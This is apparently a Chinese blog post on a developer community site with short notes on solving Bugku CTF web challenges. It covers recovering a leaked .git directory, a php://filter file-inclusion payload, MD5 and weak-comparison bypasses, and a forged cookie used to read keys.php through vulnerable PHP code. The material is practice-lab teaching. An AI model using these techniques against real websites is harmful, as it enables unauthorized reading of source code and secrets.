备案控制台

开发者社区开发与运维文章正文

bugku web篇（一）

2022-12-02 122

版权

版权声明：

本文内容由阿里云实名注册用户自发贡献，版权归原作者所有，阿里云开发者社区不拥有其著作权，亦不承担相应法律责任。具体规则请查看《阿里云开发者社区用户服务协议》和《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容，填写侵权投诉表单进行举报，一经查实，本社区将立刻删除涉嫌侵权内容。

简介： bugku web篇（一）

bugku web篇（一）

source

WEB

描　　述: 我哥说渗透我只用linux环境

wget -r http://114.67.246.176:17328/.git

下载后进入目录

cmd

git reflog

git show xxx

xxx为git reflog出来的东西的名字，git show 40c6d51

源代码WEB 已解决

分数: 20 金币: 2

题目作者: harry

一　　血: lsmzr

一血奖励: 1金币

解　　决: 6813

提　　示:

描　　述: 看看源代码？

文件包含

WEB 已解决

描　　述: flag{}

http://xxxx/?file=php://filter/read=convert.base64-encode/resource=index.php

好像需要密码

WEB

描　　述: 好像需要密码

备份是个好习惯

WEB 未解决

描　　述: 备份是个好习惯

1、弱类型比较：科学计数法和数组都可以 2、复写key绕过

dirsearch扫描出bak备份目录，然后分析源码，使用md5绕过

cookies

WEB 未解决

描　　述: cookies欺骗

通过以上python 脚本，即可读取index.php的源代码
<?php
error_reporting(0);
$file=base64_decode(isset($_GET['filename'])?$_GET['filename']:"");
$line=isset($_GET['line'])?intval($_GET['line']):0;
if($file=='') header("location:index.php?line=&filename=a2V5cy50eHQ=");
$file_list = array(
    '0' =>'keys.txt',
    '1' =>'index.php',
);
if(isset($_COOKIE['margin']) && $_COOKIE['margin']=='margin'){
    $file_list[2]='keys.php';
}
if(in_array($file, $file_list)){
    $fa = file($file);
    echo $fa[$line];
}
?>
构造Cookie 信息
Cookie: margin=margin
keys.php 进行base64 编码a2V5cy5waHA=

文章标签：

PHP

开发工具

Linux

数据安全/隐私保护

git

关键词：

web bugku

5q2a2sugf4ej6

目录

相关文章

白猫a

|

9月前

|

JavaScript 前端开发

Bugku CTF web 你必须让他停下来解题思路

Bugku CTF web 你必须让他停下来解题思路

白猫a

49 2 2

白猫a

|

9月前

Bugku CTF web GET 解题思路

Bugku CTF web GET 解题思路

白猫a

63 0 0

白猫a

|

9月前

bugku ctf Web POST 解题思路

火狐插件HackBar

白猫a

80 0 0

5q2a2sugf4ej6

|

安全 JavaScript Shell

bugku web篇（二）

bugku web篇（二）

5q2a2sugf4ej6

205 0 0

5q2a2sugf4ej6

|

SQL 安全 PHP

bugku web篇（三）

bugku web篇（三）

5q2a2sugf4ej6

87 0 0

落寞的鱼

|

程序员 Shell PHP

CTF BugKu平台———(Web篇②）

CTF BugKu平台———(Web篇②）总结

落寞的鱼

278 0 0

CTF BugKu平台———(Web篇②）

落寞的鱼

|

Shell PHP 开发工具

CTF BugKu平台—(Web篇①）

CTF BugKu平台—(Web篇①）

落寞的鱼

501 0 0

球球不吃虾

|

2天前

|

存储安全前端开发

第五章跨域资源共享（CORS）：现代Web开发中的关键机制

第五章跨域资源共享（CORS）：现代Web开发中的关键机制

球球不吃虾

19 1 1

龙大吉

|

4天前

|

设计模式开发框架数据库

Python Web开发主要常用的框架

【5月更文挑战第12天】Python Web开发框架包括Django、Flask、Tornado和Pyramid。Django适用于复杂应用，提供ORM、模板引擎等全套功能；Flask轻量级，易于扩展，适合小型至中型项目；Tornado擅长处理高并发，支持异步和WebSockets；Pyramid灵活强大，可适配多种数据库和模板引擎，适用于各种规模项目。选择框架需依据项目需求和技术栈。

龙大吉

121 2 2

老板这功能得加钱

|

1天前

|

数据安全/隐私保护

那些酷炫的网页你也可以做到——第六篇，小型公司web开发

那些酷炫的网页你也可以做到——第六篇，小型公司web开发

老板这功能得加钱

6 0 0

热门文章

最新文章

web服务器（Apache）访问日志（access_log）详细解释

＜今日份知识点：web常见的攻击方式（网络攻击）有哪些？如何预防？如何防御呢？＞

【好玩的经典游戏】Docker部署FC-web游戏模拟器

Flask性能优化：打造高性能Web应用

Node.js在前端的妙用：打造更出色的Web体验

Spring Boot 底层级探索系列 04 - Web 开发（2）

PYTHON用GARCH、离散随机波动率模型DSV模拟估计股票收益时间序列与蒙特卡洛可视化

Visual Basic的Web服务和REST API开发指南

在Python Web开发过程中：数据库与缓存，MySQL和NoSQL数据库的主要差异是什么？

探索Gin框架：快速构建高性能的Golang Web应用

构建高性能Web应用：前端性能优化的关键策略与实践

视觉智能平台常见问题之web端编辑器实现如何解决

构建高性能Web应用的关键技术

构建响应式Web界面：Flexbox的力量

探索现代Web应用中的微前端架构

如何在本地安装Flask并将其web界面发布到公网上远程访问协同开发

前端开发新趋势：Web3、区块链和虚拟现实

构建响应式Web界面：Flexbox布局的力量

JAVA Web项目开发SSM框架搭建（第一天）

JAVA Web项目开发创建Web项目（第一天）

相关课程

更多

Python Web开发基础

Java Web开发系列课程 - Spring框架入门

企业Web常用架构LAMP-LNMP实战

高校精品课-西安交通大学-Web 编程技术

Java Web项目实战 - 图书商城

Java面试疑难点解析 - Java Web开发

相关电子书

更多

Web应用系统性能优化

高性能Web架构之缓存体系

PWA:移动Web的现在与未来

相关实验场景

更多

每个IT人都想学的“Web应用上云经典架构”实战

使用SLB+2ECS+NAS，部署电商web网站的高可用架构

1分钟SAE部署Web在线游戏

Html5和Webpack3：Webpack5的常见用法

Html5和Webpack2：Webpack5打包JS和样式表

Html5和Webpack1：Webpack5打包工具介绍

下一篇

2024年阿里云免费云服务器及学生云服务器申请教程参考